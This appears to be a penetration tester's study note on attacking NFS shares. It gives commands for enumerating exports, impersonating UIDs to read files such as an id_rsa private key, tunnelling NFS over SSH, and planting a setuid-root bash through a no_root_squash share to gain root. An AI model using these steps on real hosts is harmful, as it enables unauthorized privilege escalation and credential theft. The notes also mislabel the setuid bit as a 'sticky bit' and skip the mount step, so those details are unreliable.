x

NFS (2049)

Enumeration

showmount $IP
showmount -e $IP

New user with new permissions

sudo groupadd -g 1014 <group name>
sudo groupadd -g 1014 1014
sudo useradd -u 1014 -g 1014 <user>
sudo useradd -u 1014 -g 1014 test
sudo passwd <user>
sudo passwd test

Changing permissions

The user cannot be logged in or active 

sudo usermod -aG 1014 root

Changing owners

-rw------- 1 root root 3381 Sep 24  2020 id_rsa

sudo chown kali id_rsa

-rw------- 1 kali root 3381 Sep 24  2020 id_rsa

NFS Shares

Check upon initial access 

cat /etc/exports

no_root_squash

Files created via NFS inherit the remote user’s ID. If the user is root, and root squashing is enabled, the ID will instead be set to the “nobody” user.

Notice that the /srv share has root squashing disabled. Because of this, on our local machine we can create a mount point and mount the /srv share. 

-bash-4.2$ cat /etc/exports

/srv/Share 10.1.1.0/24(insecure,rw)

/srv/Share 127.0.0.1/32(no_root_squash,insecure,rw)

"no_root_squash"

Setup

sshuttle -r sea@10.11.1.251 10.1.1.0/24 #setup

ssh -L 6070:127.0.0.1:2049 userc@10.1.1.27 -N #tunnel for 127.0.0.1 /srv/Share

mkdir /mnt/tmp

Copy over a reliable version of bash from the victim 

scp userc@10.1.1.27:/bin/bash . 

chown root:root bash; chmod +s bash #change ownership and set sticky bit

Login to victim computer 

ssh userc@10.1.1.27

Exploit

cd /srv/Share

check for sticky bit 

ls -la

How to execute with stick bit 

./bash -p 

whoami

Backlinks

Tags

Left-click: follow link, Right-click: select node, Scroll: zoom
x